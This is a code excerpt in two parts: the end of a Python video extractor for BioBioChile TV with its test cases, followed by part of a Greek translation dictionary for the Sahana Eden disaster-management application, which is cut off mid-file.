'url': 'http://tv.biobiochile.cl/notas/2015/10/21/sobre-camaras-y-camarillas-parlamentarias.shtml',
'md5': '26f51f03cf580265defefb4518faec09',
'info_dict': {
'id': 'sobre-camaras-y-camarillas-parlamentarias',
'ext': 'mp4',
'title': 'Sobre Cámaras y camarillas parlamentarias',
'thumbnail': 're:^https?://.*\.jpg$',
'uploader': 'Fernando Atria',
},
'skip': 'URL expired and redirected to http://www.biobiochile.cl/portada/bbtv/index.html',
}, {
# different uploader layout
'url': 'http://tv.biobiochile.cl/notas/2016/03/18/natalia-valdebenito-repasa-a-diputado-hasbun-paso-a-la-categoria-de-hablar-brutalidades.shtml',
'md5': 'edc2e6b58974c46d5b047dea3c539ff3',
'info_dict': {
'id': 'natalia-valdebenito-repasa-a-diputado-hasbun-paso-a-la-categoria-de-hablar-brutalidades',
'ext': 'mp4',
'title': 'Natalia Valdebenito repasa a diputado Hasbún: Pasó a la categoría de hablar brutalidades',
'thumbnail': 're:^https?://.*\.jpg$',
'uploader': 'Piangella Obrador',
},
'params': {
'skip_download': True,
},
'skip': 'URL expired and redirected to http://www.biobiochile.cl/portada/bbtv/index.html',
}, {
'url': 'http://www.biobiochile.cl/noticias/bbtv/comentarios-bio-bio/2016/07/08/edecanes-del-congreso-figuras-decorativas-que-le-cuestan-muy-caro-a-los-chilenos.shtml',
'info_dict': {
'id': 'edecanes-del-congreso-figuras-decorativas-que-le-cuestan-muy-caro-a-los-chilenos',
'ext': 'mp4',
'uploader': '(none)',
'upload_date': '20160708',
'title': 'Edecanes del Congreso: Figuras decorativas que le cuestan muy caro a los chilenos',
},
}, {
'url': 'http://tv.biobiochile.cl/notas/2015/10/22/ninos-transexuales-de-quien-es-la-decision.shtml',
'only_matching': True,
}, {
'url': 'http://tv.biobiochile.cl/notas/2015/10/21/exclusivo-hector-pinto-formador-de-chupete-revela-version-del-ex-delantero-albo.shtml',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
rudo_url = RudoIE._extract_url(webpage)
if not rudo_url:
raise ExtractorError('No videos found')
title = remove_end(self._og_search_title(webpage), ' - BioBioChile TV')
thumbnail = self._og_search_thumbnail(webpage)
uploader = self._html_search_regex(
r'<a[^>]+href=["\']https?://(?:busca|www)\.biobiochile\.cl/(?:lista/)?(?:author|autor)[^>]+>(.+?)</a>',
webpage, 'uploader', fatal=False)
return {
'_type': 'url_transparent',
'url': rudo_url,
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'uploader': uploader,
}
| unlicense |
julianprabhakar/eden_car | languages/el.py | 6 | 106034 | # -*- coding: utf-8 -*-
{
"If this setting is enabled then all deleted records are just flagged as deleted instead of being really deleted. They will appear in the raw database access but won't be visible to normal users.": 'Εαν αυτή η ρύθμιση είναι ενεργοποιημένη, τότε όλα τα διεγραμένα πεδία είναι απλά σημειωμένα ως διεγραμμένα αντί να διεγραφούν πραγματικά. Θα εμφανίζοντια στη βάση δεδομένων, αλλά δεν θα είναι ορατά στους απλούς χρήστες.',
"Phone number to donate to this organization's relief efforts.": 'Αριθμός τηλεφώνου για δωρεές για τις προσπάθειες ανακούφισης που προσφέρονται από τον οργανισμό.',
"Sorry, things didn't get done on time.": 'Συγνώμμη, τα πράγρματα δεν έγιναν εγκαίρως',
"Sorry, we couldn't find that page.": 'Λυπούμαστε, αλλά δεν μπορέσαμε να βρούμε αυτή τη σελίδα.',
"System's Twitter account updated": 'Λογαριασμός Twitter του Συστήματος ενημέρωθηκε',
"The person's manager within this Office/Project.": 'Ο διευτθυντής του ατόμου στο γραφείο του (ή σε έργο του)',
"To search for a body, enter the ID label of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": 'Για να αναζητήσετε μ΄πιθα σορό, πληκτρολογήστε την ετικέτα ID του σορού. Μπορείτε να χρησιμοποιήσετε το% ως τελεστή. Πατήστε «Αναζήτηση» χωρίς εισαγωγή στην λίστα όλων των φορέων.',
"To search for a hospital, enter any of the names or IDs of the hospital, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": 'Για να αναζητήσετε νοσοκομείο, εισάγεται οποιοδήποτε από ταονόματα ή τα ID των νοσοκομείων, διαχωριζόμενα από κενά. Μπορείτε να χρησιμοποιήσετε το % για μαζική αναζήτηση. Πιέστε "Αναζήτηση" χωρίς να εισάγετε τίποτα για να δείτε όλα τα νοσοκομεία',
"To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": 'Για την αναζήτηση ενός ατόμου, εισάγετε οποιοδήποτε από τα, όνομα, επίθετο, δεύτερο όνομα, αριθμό ταυτότητας, χωρισμένα με κενά. Μπορείτε να χρησιμοποιήσετε παραμέτρους αναζήτησης όπως το %. Πατήστε "Αναζήτηση" χωρίς καμία εισαγωγή για να δείτε όλες τις εγγραφές. ',
"View and/or update details of the person's record": 'Δείτε ή ενημερώσετε τις λεπτομέρειες των δεδομένων του ατόμου',
"You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'Έχετε προσωπικές ρυθμίσεις, οι αλλαγές που γίνονται εδώ δεν θα είναι ορατές σε σας. Για να αλλάξετε τις προσωπικές σας ρυθμίσεις, πατήστε',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"ενημέρωση" είναι κατ\' αεπιλογήν έκφρασή (expression) όπως "πεδίο1=\'νέατιμή\'". Δεν μπορείτε να ενημερώσετε ή να διαγράψετε τα αποτελέσματα του JOIN',
'# of International Staff': 'αριθμός προσωπικού από άλλες χώρες',
'# of People Affected': 'Αριθμός ατόμων που πλήττονται',
'# of People Injured': 'Αριθμός τραυματιών',
'15-30 minutes': '15-30 λεπτά',
'8-14 days': '8-14 ημέρες',
'A Reference Document such as a file, URL or contact person to verify this data. You can type the 1st few characters of the document name to link to an existing document.': 'Ένα έγγραφο αναφοράς, όπως το πρόσωπο αρχείο, URL ή άτομο επικοινωνίας για την επαλήθευση αυτών των δεδομένων. Μπορείτε να πληκτρολογήσετε μερικούς από τους πρώτους χαρακτήρες του ονόματος του εγγράφου για τη σύνδεση με ένα υπάρχον έγγραφο.',
'A Warehouse is a physical place which contains Relief Items available to be Distributed.': 'Η Αποθήκη είναι ένας χώρος ο οποίος περιέχει αντικείμενα προς τους πληγέντες διαθέσιμα για διανομή',
'A brief description of the group (optional)': 'Μία μικρή περιγραφή της ομάδας (προεραιτικό)',
'A place within a Site like a Shelf, room, bin number etc.': 'Ένα μέρος σε μία περιοχή σαν π.χ. ράφι, δωμάτιο, αριθμός δοχείου κλπ.',
'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'Μία "εικόνα" της περιοχής ή επιπρόσθετα έγγγραφα που περιέχουν συμπληρωματικές πληροφορίες για την περιοχή μπορούν να "μεταφορτοθούν" εδώ. ',
'ABOUT THIS MODULE': 'ΣΧΕΤΙΚΑ ΜΕ ΑΥΤΟ ΤΟ ΥΠΟΠΡΟΓΡΑΜΜΑ',
'Ability to customize the list of human resource tracked at a Shelter': 'Δυνατότητα παραμετροποίησης των ανθρώπων που εντοπίστηκαν σε ένα καταφύγιο',
'Ability to customize the list of important facilities needed at a Shelter': 'Δυνατότητα για παραμετροποίηση του καταλόγου σημαντικών υποδομών που είνια απαραίτητα σε ένα καταφήγιο',
'Ability to track partial fulfillment of the request': 'Δυνατότητα εντοπισμού-καταγραφή μερικής ικανοποίησης του αιτήματος',
'Ability to view Results of Completed and/or partially filled out Surveys': 'Δυνατότητα για προβολή αποτελεσμάτων συμπληρωμένων ή ημιτελών Ερευνών',
'Access to Shelter': 'Πρόσβαση σε καταφύγιο',
'Activities': 'Λραστηριότητες',
'Activity Details': 'Λεπτομέρειες Δραστηριότητας',
'Add Address': 'Προσθήκη νέας Διεύθυνσης',
'Add Baseline': 'Προσθήκη Αρχικής κατάστασης',
'Add Bins': 'Προσθήκη Κάδων',
'Add Contact': 'Προσθήκη επαφής',
'Add Credentials': 'Προσθήκη Πιστοποιήσεων',
'Add Donor': 'Προσθήκη Δωρητών',
'Add Identity': 'Προσθήκη Ταυτότητας',
'Add Image': 'Προσθήκη εικόνας',
'Add Item Catalog Category ': 'Προσθήκη κατηγορίας καταλόγου αντικειμένων',
'Add Key': 'Προσθήκη κλειδιού(key)',
'Add Kit': 'Προσθήκη Kit',
'Add Locations': 'Προσθήκη θέσεων',
'Add Log Entry': 'Προσθήκη εισαγωγής καταγραφής(Log Entry)',
'Add Member': 'Προσθήκη μέλους',
'Add Membership': 'Προσθήκη Μέλους',
'Add Message': 'Προσθήκη μηνύματος',
'Add Need Type': 'Προσθήκη Τύπου Ανάγκης',
'Add New Assessment Summary': 'Πρόσθεσε νέα έκθεση αξιολόγησης',
'Add New Donor': 'Προσθήκη νέου δωρητή',
'Add New Flood Report': 'Προσθήκη νέας Έκθεσης Πλημμυρών',
'Add New Key': 'Προσθήκη νέου κλειδιού',
'Add New Need': 'Προσθήκη Νέων Αναγκών',
'Add New Request Item': 'Προσθήκη νέου αντικειμένου που ζητήθηκε',
'Add New Response': 'Προσθήκη νέας ανταπόκρισης',
'Add New Storage Location': 'Προσθήκη νέας περιοχής αποθήκευσης',
'Add Person': 'Προσθήκη ατόμου',
'Add Position': 'Προσθήκη θέσης',
'Add Recipient Site.': 'Προσθήκη Περιοχής αποστολής προς',
'Add Recovery Report': 'Προσθήκη Αναφοράς Ανάκτησης-Εύρεσης',
'Add Request Item': 'Προσθήκη Αντικειμένου που ζητήθηκε',
'Add Sender Organization': 'Προσθήκη οργανισμού που αποστέλει',
'Add Sender Site': 'Προσθήκη Περιοχής Αποστολέα',
'Add Site': 'Προσθήκη τοποθεσίας',
'Add Skill Types': 'Προσκθήκη κατηγορίας προσόντων',
'Add Survey Question': 'Προσθήκη ερώτησης έρευνας',
'Add Survey Section': 'Προσθήκη Τομέα Αναζήτησης',
'Add Survey Template': 'Προσθήκη Προτύπου Έρευνας',
'Add Team Member': 'Προσθήκη μέλους',
'Add Team': 'Προσθήκη Ομάδας',
'Add Unit': 'Προσθήκη Μονάδας',
'Add Warehouse Item': 'Προσθήκη αντικειμένου αποθήκης',
'Add a new Site from where the Item is being sent.': 'Προσθήκη νέας τοποθεσίας από όπου το αντικείμενο αποστέλεται',
'Add a new Site where the Item is being sent to.': 'Προσθήκη νέας Περιοχής, όπου αντικείμενα αποστέλονται προς εκεί.',
'Add new staff role.': 'Προσθήκη νέου ρόλου προσωπικού.',
'Add the Storage Location where this this Bin belongs to.': 'Προσθέστε τον αποθηκευτικό χώρο όπου το "καλάθι" ανήκει.',
'Add the main Warehouse/Site information where this Item is to be added.': 'Προσθέστε Πληροφορίες της κύριας αποθήκης, όπου το στοιχείο αυτό πρέπει να προστεθεί.',
'Added to Group': 'Χρήστης - Μέλος προστέθηκε',
'Added to Team': 'Χρήστης - Μέλος προστέθηκε',
'Address Type': 'Τύπος διεύθυνσης',
'Address added': 'Διεύθυνση προστέθηκε',
'Address deleted': 'Διεύθυνση διεγράφη',
'Adolescent (12-20)': 'Έφηβος (12-20 ετών)',
'Adult Psychiatric': 'Ψυχιατρικό ενηλίκων',
'Adult female': 'Ενήλικας Γυναίκα ',
'Advanced Catalog Search': 'Προηγμένη αναζήτηση στο κατάλογο',
'Advanced Location Search': 'Προηγμένη αναζήτηση θέσης',
'Advanced Search': 'Σύνθετη Αναζήτηση',
'Age group does not match actual age.': 'Ηλικιακή ομάδα δεν αντιστοιχεί στην πραγματική ηλικία.',
'Airport Closure': 'Κλείσιμο Αεροδρομίου ',
'All Locations': 'Όλες οι θέσεις',
'All Requested Items': 'Όλα τα ζητηθέντα αντικείμενα',
'Allowed to push': 'Επιτρέπονται να πιέσουν',
'Allows authorized users to control which layers are available to the situation map.': 'Επιτρέπει σε εξουσιοδοτημένα μέλη να ελέγχουν πια χαρτογραφικά επίπεδα είναι διαθέσιμα στο χάρτη απεικόνισης της κατάστασης',
'An intake system, a warehouse management system, commodity tracking, supply chain management, procurement and other asset and resource management capabilities.': 'Σύστημα υποδοχής, σύστημα διαχείρισης αποθήκης, καταγραφής και παρακολουθησης αγαθών, διαχείρσης αλυσίδας προμηθειών, προμήθειας και επιπλέον δυνατοτήτων διαχείρησης πόρων.',
'Animal Feed': 'Τροφή ζώου',
'Answer Choices (One Per Line)': 'Επιλογές απαντήσεων (Μία ανά γραμμή)',
'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'Οποιαδήποτε διαθέσιμα μεταδεδομένα στα αρχεία θα διαβαστούν αυτόματα, όπως Χρονοσφραγίδα, Συγγραφέας, Γεωγραφικό μήκος & πλάτος',
'Archive not Delete': 'Αρχείο - Δεν διαγράφετε',
'Assessment Summary Details': 'Λεπτομέρειες της Έθεσης Εκτίμησης',
'Assessment updated': 'Αξιολόγηση ενημερώθηκε',
'Assessment': 'Εκτίμηση - Αξιολόγηση',
'Asset Assignments deleted': 'Αναθέσεις πόρων διεγράφησαν',
'Assign to Org.': 'Ανατέθηκε στον Οργανισμό.',
'Assigned To': 'Εκχωρήθηκε στον ',
'Assignments': 'Εκχωρήσεις εργασιών-καθηκόντων',
'At/Visited Location (not virtual)': 'Στην/Επισκεπτόμενη Θέση (μη εικονική)',
'Available databases and tables': 'Διαθέσιμες βάσεις δεδομένων και πίνακες',
'Available in Viewer?': 'Διαθέσιμο στην απεικόνιση?',
'Available until': 'Διαθέσιμη μονάδα',
'Availablity': 'Διαθεσιμότητα',
'Baby And Child Care': 'Φροντίδα μωρού και παιδιού',
'Background Color': 'Χρώμα υποβάθρου',
'Bank/micro finance': 'Τράπεζα μικροχρηματοδότησης',
'Base Unit': 'Μονάδα Βάσης',
'Baseline Type updated': 'Τύπος Baseline ενημερώθηκε',
'Baseline Types': 'Τύποι Αρχικοποίησης',
'Baselines Details': 'Λεπτομέρειες baseline',
'Basic information on the requests and donations, such as category, the units, contact details and the status.': 'Βασικές πληροφορίες για τα αιτήματα και τις δωρεές, όπως π.χ., κατηγορία, μονάδες, στοιχεία επικοιωνίας και κατάσταση',
'Basic reports on the Shelter and drill-down by region': 'Βασικές αναφορές για το κατάλλημα και κατασκηνώσεις ανα περιοχή',
'Basic': 'Βασικό',
'Baud': 'Ρυθμός μετάδοσης (baud)',
'Bed Type': 'Τύπος Κρεβατιού',
'Blood Type (AB0)': 'Ομάδα Αίματος (ΑΒ0)',
'Blowing Snow': 'Χιονοθυέλλα',
'Body Recovery Requests': 'Αιτήματα για ανάσυρη πτωμάτων',
'Bomb Explosion': 'Έκρηξη βόμβας',
'Border Color for Text blocks': 'Χρώμα περιγράμματος για κείμενο',
'Bounding Box Size': 'Μέγεθος Περιγράματος - Περιοχής Ενδιαφέροντος',
'Buddhist': 'Βουδιστής',
'Budget Updated': 'Προυπολογισμός ενημερώθηκε',
'Budget': 'Προϋπολογισμός',
'Budgets': 'Προϋπολογισμοί',
'Building Aide': 'Οικοδομική βοήθεια',
'Building Collapsed': 'Κατάρρευση Κτιρίου',
'Bulk Uploader': 'Μεταφορτωτής(Uploader) μεγάλου όγκου',
'Bundle Updated': 'Αναβάθμιση του πακέτου',
'Bundle': 'Δέσμη',
'Burned/charred': 'Καμμένο/απανθρακωμένο',
'CSS file %s not writable - unable to apply theme!': 'Τα αρχεία CSS %s δεν έιναι εγγράψιμα - Αδύνατον να εφαρμοστεί το θέμα',
'Calculate': 'Υπολογισμός',
'Cancelled': 'Ακυρώθηκε',
'Cannot be empty': 'Δεν μπορεί να είναι κενό',
'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Συλλογή δεδομένων σε ομάδες θυμμάτων (Τουρίστες, Επιβάτες, Οικογένειες, κλπ)',
'Cardiology': 'Καρδιολογική',
'Casual Labor': 'Περιστασιακή εργασία',
'Catalog Item added': 'Αντικείμενο καταλόγου προστέθηκε.',
'Catalog Item updated': 'Θέση Καταλόγου ενημερώθηκε',
'Catalog Item': 'Αντικείμενο καταλόγου',
'Check for errors in the URL, maybe the address was mistyped.': 'Κάντε έλεγχο για λάθη στις URL, ίσως να υπάρχει τυπογραφικό λάθος στη διεύθυνση.',
'Check if the URL is pointing to a directory instead of a webpage.': 'Ελέγξτε εαν η URL δείχνει προς φάκελο αρχείων αντί ιστοσελίδας',
'Checklist of Operations': 'Κατάλογος Ενεργειών',
'Child headed households (<18 yrs)': 'Νοικοκυριά με παιδιά (<18 ετών)',
'Children (2-5 years)': 'Παιδιά (2 - 5 ετών)',
'Children (5-15 years)': 'Παιδιά (5 - 15 ετών)',
'Children (< 2 years)': 'Παιδιά (< 2 ετών)',
'Cholera Treatment Capability': 'Δυνατότητα Θεραπείας Χολέρας',
'Cholera Treatment': 'Θεραπεία Χολέρας',
'Church': 'Εκκλησία',
'Click on the link %(url)s to reset your password': 'Πατήστε στο σύνδεσμο %(url)s to reset your password',
'Click on the link %(url)s to verify your email': 'Πατήστε στο σύνδεσμο %(url)s to verify your email',
'Clinical Laboratory': 'Κλινικό εργαστήριο',
'Closed': 'Κελιστό',
'Cluster Subsector added': 'Τμήμα υποτομέα προστέθηκε',
'Cluster Subsector deleted': 'Υπο-τομέας cluster διαγράφηκε',
'Cluster(s)': 'Τμήμα(τα)',
'Code': 'Κωδικός',
'Color of Buttons when hovering': 'Χ΄ρωμα των κουμπιών όταν υπάρχει μετακίνηση ποντικιού από πάνω',
'Color of dropdown menus': 'Χρώμα αναδιπλώμενων μενού',
'Column Choices (One Per Line': 'Επιλογές Στήλης (μία σε κάθε γραμμή',
'Comments': 'Σχόλια',
'Communication problems': 'Προβλήματα επικοινωνίας',
'Community Member': 'Μέλος κοινότητας',
'Complete Unit Label for e.g. meter for m.': 'Συμπληρώστε την ετικέτα για μονάδα μέτρησης , για παράδειγμα μέτρα αντί του m.',
'Config updated': 'Οι ρυθμίσεις (config) ανανεώθηκαν',
'Config': 'Καθορισμός (config)',
'Configs': 'Καθορισμοί(configs)',
'Confirmed': 'Επιβεβαιωμένα',
'Conflict Details': 'Λεπτομέρειες σύγκρουσης - διαμάχης',
'Consumable': 'Αναλώσιμο',
'Contact Data': 'Δεδομένα επικοινωνίας',
'Contact Directory': 'Επικοινωνία Directory',
'Contact Information Deleted': 'Πληροφορίες επαφής διαγράφηκαν',
'Contact Name': 'Όνομα επικοινωνίας',
'Contact us': 'Επικοινωνήστε μαζί μας',
'Contact': 'Επικοινωνήστε',
'Contacts': 'Επαφές',
'Corn': 'Καλαμπόκι',
'Cost per Megabyte': 'Κόστος ανά Megabyte',
'Create Catalog Item': 'Προσθήκη Νέου Αντικειμένου Καταλόγου',
'Create Catalog': 'Προσθήκη καταλόγου',
'Create Contact': 'Προσθήκη επαφής',
'Create Dead Body Report': 'Προσθήκη Αναφοράς Νεκρού',
'Create Feature Layer': 'Προσθήκη Επιπέδου Χάρτη(Feature)',
'Create Hospital': 'Προσθήκη Νοσοκομείου',
'Create Import Job': 'Δημιουργία Εισαγωγής Εργασίας ',
'Create Incident Report': 'Προσθήκη αναφοράς συμβάντος',
'Create Incident': 'Προσθήκη νέου συμβάντος',
'Create Marker': 'Προσθήκη νέου δείκτη',
'Create Member': 'Προσθήκη μέλους',
'Create Kit': 'Προσθήκη νέου Kit',
'Create Office': 'Προσθήκη γραφείου',
'Create Organization': 'Προσθήκη οργανισμού',
'Create Projection': 'Προσθήκη Προβολικού Συστήματος - Projection',
'Create Report': 'Προσθήκη νέας Αναφοράς',
'Create Request': 'Υποβολή Αιτήματος',
'Create Resource': 'Προσθήκη πόρου',
'Create Sector': 'Προσθήκη Τομέα',
'Create Shelter Service': 'Προσθήκη Νέας Υπηρεσίας Καταφυγίου',
'Create Shelter': 'Προσθήκη νέου Καταφυγίου',
'Create Skill': 'Προσθήκη νέου προσόντος',
'Create User': 'Προσθήκη Νέου Χρήστη',
'Create Warehouse': 'Προσθήκη Νέας Αποθήκης',
'Create a group entry in the registry.': 'Δημιουργήστε μια καταχώρηση ομάδας στο μητρώο.',
'Credential Details': 'Λεπτομέρειες πιστοποίησης',
'Crime': 'Έγκλημα',
'Current Group Members': 'Τρέχοντα μέλη ομάδος',
'Current Memberships': 'Τρέχοντα μέλη',
'Current Twitter account': 'Τρέχων λογαριασμός Twitter ',
'Current problems, details': 'Τρέχοντα προβλήματα, λεπτομέρειες',
'Customisable category of aid': 'Παραμετροποιήσιμη κατηγορία βοήθειας.',
'DECISION': 'ΑΠΟΦΑΣΗ',
'Dam Overflow': 'Υπερχείλιση Φράγματος ',
'Dangerous Person': 'Επικίνδυνο Άτομο',
'Data uploaded': 'Δεδομένα μεταφορτώθηκαν',
'Date and Time of Goods receipt. By default shows the current time but can be modified by editing in the drop down list.': 'Ημερομηνία και Ώρα παραλαβής αγαθών. Εξ ορισμού δείχνει την τρέχουσα ώρα και μπορεί να τροποποιηθεί από την drop down λίστα.',
'Date of Latest Information on Beneficiaries Reached': 'Ημερομηνία λήψης πιο πρόσφατων πηλροφοριών για δικαιούχους',
'Date of Report': 'Ημερομηνία της έκθεσης',
'Date/Time of Find': 'Ημερομηνία / Ώρα Ανεύρεσης',
'Date/Time': 'Ημερομηνία/Ώρα',
'Dead Body Reports': 'Αναφορές νεκρών',
'Deaths/24hrs': 'Απώλειες ανά 24ώρο',
'Decentralized Administration': 'αποκεντρωμένες διοικήσεις',
'Decentralized Administrations': 'αποκεντρωμένες διοικήσεις',
'Decimal Degrees': 'Δεκαδικοί βαθμοί',
'Default Height of the map window. In Window layout the map maximises to fill the window, so no need to set a large value here.': "Εξ' ορισμού ύψος του παραθύρου χάρτη. Στη διαρύθμιση των παραθύρων ο χάρτης μεγιστοποιείται για να γεμίσει το παράθυρο, έτσι λοιπόν δεν είναι απαραίτητο να βάλετε μεγαλύτερη τιμή εδώ.",
'Default synchronization policy': 'Προεπιλεγμένη πολιτική συγχρονισμού',
'Defaults updated': 'Προκαθορισμένες ρυθμίσεις ενημερώθηκαν',
'Delete Assessment Summary': 'Διαγραφή Περίληψης Αξιολόγησης',
'Delete Baseline': 'Διαγραφή Baseline',
'Delete Bundle': 'Διαγραφή πακέτου (bundle)',
'Delete Config': 'Διαγραφή του config',
'Delete Distribution Item': 'Διαγραφή Αντικειμένου προς διανομή',
'Delete Incident Report': 'Διαγραφή Αναφοράς Συμβάντος',
'Delete Item': 'Διαγραφή αντικειμένου',
'Delete Kit': 'Διαγραφή kit',
'Delete Layer': 'Διαγραφή επιπέδου',
'Delete Location': 'Διαγραφή τοποθεσίας',
'Delete Marker': 'Διαγραφή δείκτη',
'Delete Membership': 'Διαγραφή μέλους',
'Delete Need Type': 'Διαγραφή τύπων αναγκών',
'Delete Need': 'Διαγράψτε την ανάγκη',
'Delete Office': 'Διαγραφή Γραφείου',
'Delete Old': 'Διέγραψε Παλαιότερο',
'Delete Photo': 'Διαγραφή Φωτογραφίας',
'Delete Project': 'Διαγραφή έργου (project)',
'Delete Projection': 'Διαγραφή Προβολικού Συστήματος',
'Delete Rapid Assessment': 'Διαγραφή Στιγμιαίας εκτίμησης',
'Delete Recovery Report': 'Διαγραφή Αναφοράς Ανάσυρσης/Αποκατάστασης',
'Delete Section': 'Διαγραφή τμήματος',
'Delete Service Profile': 'Διαγραφή Προφιλ Υπηρεσίας',
'Delete Survey Question': 'Διαγραφή ερώτησης έρευνας',
'Delete Survey Template': 'Διαγραφή Προτύπου Αναζήτησης-Έρευνας',
'Delete Unit': 'Διαγραφή μονάδας',
'Delete Warehouse': 'Διαγραφή Αποθήκης',
'Delete from Server?': 'Διαγραφή από το Server?',
'Demographic': 'Δημογραφικό',
'Dental Examination': 'Οδοντιατρική εξέταση',
'Dental Profile': 'Οδοντικό Προφίλ',
"Describe the procedure which this record relates to (e.g. 'medical examination')": 'Περιγράψτε την διαδικασία με την οποία σχετίζεται αυτή η εγγραφή (π.χ. "Ιατρική Εξέταση")',
'Description of defecation area': 'Περιγραφή της περιοχής defecation',
'Description': 'Περιγραφή',
'Destination': 'Προορισμός',
'Direction': 'Κατεύθυνση',
'Disaster Victim Identification': 'Αναγνώριση θυμάτων καταστροφής',
'Disasters': 'καταστροφές',
'Discussion Forum': 'Βήμα συζητήσεων',
'Disease vectors': 'Διανύσματα ασθενειών',
'Dispatch': 'Διαβίβαση',
'Dispensary': 'Ιατρείο',
'Dispose': 'Διάθεση',
'Distribution Item Details': 'Λεπτομέρειες Αντικειμένου Διανομής',
'Distribution Item': 'Αντικείμενο για διανομή',
'District': 'Περιοχή',
'Do you want to over-write the file metadata with new default values?': 'Θέλετε να διαγράψετε το αρχείο μεταδεδομένων με τις νέες προκαθορισμένες τιμές;',
'Document Details': 'Λεπτομέρειες Εγγράφου',
'Document added': 'Έγγραφο προστέθηκε',
'Doing nothing (no structured activity)': 'Καμία ενέργεια (μη δομημένη ενέργεια)',
'Domestic chores': '"Οικιακές" μικροεργασίες',
'Donation Phone #': 'Τηλεφωνικός αριθμός δωρεών #',
'Donor added': 'Προσθήκη Δωρητή',
'Donor updated': 'Δωρητής ανανεώθηκε',
'Donors Report': 'Αναφορά Δότη',
'Draft': 'Πρόχειρο',
'Drugs': 'Φάρμακα',
'Dug Well': 'Σκαμμένο Πηγάδι',
'Duration': 'Διάρκεια',
'EMS Status': 'Κατάσταση EMS',
'Early Recovery': 'Έγκαιρη αποκατάσταση - εύρεση',
'Earthquake': 'Σεισμός',
'Edit Application': 'Επεξεργασία Εφαρμογής',
'Edit Assessment': 'Επεξεργασία Αξιολόγησης',
'Edit Bundle': 'Επεξεργασία του πακέτου',
'Edit Commitment': 'Επεξεργασία Υποχρέωσης-Δέσμευσης',
'Edit Contact': 'Επεξεργασία Επαφής',
'Edit Defaults': 'Επεξεργασία Προεπιλογών (Defaults)',
'Edit Details': 'Επεξεργσία λεπτομεριεών',
'Edit Disaster Victims': 'Επεξεργασία Θυμάτων Καταστροφής',
'Edit Distribution': 'Επεξεργασία Διανομής',
'Edit Document': 'Επεξεργασία κειμένου',
'Edit Identification Report': 'Επεξεργασία Έκθεσης Ταυτοποίησης',
'Edit Image Details': 'Επεξεργασία λεπτομεριών εικόνας',
'Edit Image': 'Επεξεργασία εικόνας',
'Edit Impact': 'Επεξεργασία επιπτώσεων',
'Edit Incident': 'Επεξεργασία Συμβάντος',
'Edit Item Catalog Categories': 'Επεξεργασία κατηγοριών καταλόγου αντικειμένων',
'Edit Item Catalog': 'Επεξεργασία Καταλόγου Αντικειμένων',
'Edit Item': 'Επεξεργασία αντικειμένου',
'Edit Key': 'Επεξεργασία κλειδιού',
'Edit Message': 'Επεξεργασία Μηνύματος',
'Edit Messaging Settings': 'Επεξεργασία ρυθμίσεων μηνυμάτων',
'Edit Metadata': 'Επεξεργασία μεταδεδομένων',
'Edit Peer Details': 'Επεξεργασία λεπτομερειών του Peer',
'Edit Problem': 'Επεξεργασία Προβλήματος',
'Edit Received Shipment': 'Επεξεργασία Ληφθέντος φορτίου',
'Edit Recovery Details': 'Επεξεργασία Λεπτομέρειων Ανάκτησης',
'Edit Report': 'Επεξεργασία Αναφοράς',
'Edit Request': 'Επεξεργασία Αίτησης',
'Edit Resource': 'Επεξεργασία Πόρου',
'Edit Response': 'Επεξεργασία Απάντησης-Ανταπόκρισης',
'Edit Role': 'Επεξεργασία Ρόλου',
'Edit Sector': 'Επεξεργασία Τομέα',
'Edit Setting': 'Επεξεργσία Ρύθμισης',
'Edit Settings': 'Επεξεργασία Ρυθμίσεων (settings)',
'Edit Shelter Service': 'Επεξεργασία Υπηρεσιών Καταυλισμών',
'Edit Shelter': 'Επεξεργασία καταλήματος',
'Edit Skill': 'Επεξεργασία προσόντων',
'Edit Storage Location': 'Επεξεργασία θέσης αποθήκευσης',
'Edit Survey Answer': 'Επεξεργασία απαντήσεων έρευνας',
'Edit Survey Template': 'Επεξεργασία προτύπου (template) έρευνας',
'Edit Ticket': 'Επεξεργασία Ειστηρίου',
'Edit current record': 'Επεξεργασία τρέχουσας εγγραφής',
'Edit the Application': 'Επεξεργασία της εφαρμογής',
'Editable?': 'Επεξεργάσιμο?',
'Education materials received': 'Λήφθησαν εκπαιδευτικά υλικά',
'Education materials, source': 'Εκπαιδευτικά υλικά, από που προέρχονται',
'Education': 'Εκπαίδευση',
'Either file upload or image URL required.': 'Είτε μεταφορτώστε αρχείο ή δώστε URL εικόνας',
'Elevated': 'Υπερυψωμένο',
'Embalming': 'Βαλσάμωμα',
'Emergency Department': 'Τμήμα Πρώτων Βοηθειών',
'Emergency Shelter': 'Καταφύγιο Εκτάκτου Ανάγκης',
'Enable/Disable Layers': 'Ενεργοποίηση/Απενεργοποίηση επιπέδων',
'End date': 'Ημερομηνία Τέλους',
'Enter Coordinates:': 'Εισάγετε συντεταγμένες',
'Enter a name for the spreadsheet you are uploading (mandatory).': 'Εισήγαγε όνομα για το λογιστικό φύλλο που μεταφορτώνεις (υποχρεωτικό).',
'Enter a summary of the request here.': 'Εισάγετε περίληψη του αιτήματος εδώ:',
'Enter your firstname': 'Εισάγεται το μικρό σας όνομα',
'Entering a phone number is optional, but doing so allows you to subscribe to receive SMS messages.': 'Η εισαγωγή ενός τηλεφωνικού αριθμού είναι προαιρετική, αλλά αυτό σας επιτρέπει να εγγραφείτε για να λαμβάνετε μηνύματα SMS.',
"Error logs for '%(app)s'": 'Καταγραφή σφαλμάτων για "%(app)s"',
'Errors': 'Σφάλματα',
'Estimated # of households who are affected by the emergency': 'Εκτιμώμενος αριθμός των νοικοκυριών που πλήττονται από την κατάσταση έκτακτης ανάγκης',
'Euros': 'Ευρώ',
